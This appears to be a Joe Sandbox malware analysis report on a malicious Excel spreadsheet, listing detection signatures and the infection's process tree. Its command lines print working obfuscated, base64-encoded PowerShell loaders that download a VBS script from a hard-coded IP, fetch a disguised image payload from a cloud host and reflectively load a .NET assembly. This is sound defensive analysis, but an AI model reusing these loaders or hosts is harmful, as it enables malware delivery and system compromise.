Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Euro confirmation Sp.xls

Overview

General Information

Sample name:Euro confirmation Sp.xls
Analysis ID:1574071
MD5:ee0c6a4698481c48bbc55b9a33589a54
SHA1:2abeddd26326a6dd0511c67069b0b21837e047b1
SHA256:65e15997e0ceb72609fc8a3c0cc0453ca08d98d16485163863325fba17bda28a
Tags:xlsuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected obfuscated html page
Connects to a pastebin service (likely for C&C)
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3588 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3880 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3980 cmdline: "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 4004 cmdline: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3144 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3164 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9ECF.tmp" "c:\Users\user\AppData\Local\Temp\vlwyfswc\CSCD4E4666864B4048A31961A99612757D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 3380 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 2956 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule MD5: A575A7610E5F003CC36DF39E07C4BA7D)
    • mshta.exe (PID: 2692 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 364 cmdline: "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 1916 cmdline: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 2748 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 2912 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEC91.tmp" "c:\Users\user\AppData\Local\Temp\5djzgayy\CSC760185DBFBB46BF8363AB3E3456F7D3.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 3704 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 1732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule MD5: A575A7610E5F003CC36DF39E07C4BA7D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood[1].htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 2956JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 2956INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x7f9a:$b2: ::FromBase64String(
      • 0x8002:$b2: ::FromBase64String(
      • 0x9a00:$b2: ::FromBase64String(
      • 0x17d68:$b2: ::FromBase64String(
      • 0x1854f:$b2: ::FromBase64String(
      • 0x413f3:$b2: ::FromBase64String(
      • 0x46478:$b2: ::FromBase64String(
      • 0x5f6b8:$b2: ::FromBase64String(
      • 0x5fd28:$b2: ::FromBase64String(
      • 0x76b95:$b2: ::FromBase64String(
      • 0x7f199:$b2: ::FromBase64String(
      • 0x7fe1:$b3: ::UTF8.GetString(
      • 0x99df:$b3: ::UTF8.GetString(
      • 0x17d47:$b3: ::UTF8.GetString(
      • 0x1852e:$b3: ::UTF8.GetString(
      • 0x413d2:$b3: ::UTF8.GetString(
      • 0x462b1:$b3: ::UTF8.GetString(
      • 0x5f697:$b3: ::UTF8.GetString(
      • 0x5fd07:$b3: ::UTF8.GetString(
      • 0x76b74:$b3: ::UTF8.GetString(
      • 0x7f178:$b3: ::UTF8.GetString(
      Process Memory Space: powershell.exe PID: 1732JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 1732INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x893:$b2: ::FromBase64String(
        • 0xf03:$b2: ::FromBase64String(
        • 0xe8d0:$b2: ::FromBase64String(
        • 0xf0b3:$b2: ::FromBase64String(
        • 0x264a4:$b2: ::FromBase64String(
        • 0x2650c:$b2: ::FromBase64String(
        • 0x2790e:$b2: ::FromBase64String(
        • 0x27f80:$b2: ::FromBase64String(
        • 0x3065f:$b2: ::FromBase64String(
        • 0x37080:$b2: ::FromBase64String(
        • 0x4b0a5:$b2: ::FromBase64String(
        • 0x872:$b3: ::UTF8.GetString(
        • 0xee2:$b3: ::UTF8.GetString(
        • 0xe8af:$b3: ::UTF8.GetString(
        • 0xf092:$b3: ::UTF8.GetString(
        • 0x264eb:$b3: ::UTF8.GetString(
        • 0x278ed:$b3: ::UTF8.GetString(
        • 0x27f5f:$b3: ::UTF8.GetString(
        • 0x3063e:$b3: ::UTF8.GetString(
        • 0x3705f:$b3: ::UTF8.GetString(
        • 0x4aede:$b3: ::UTF8.GetString(

        System Summary

        barindex
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 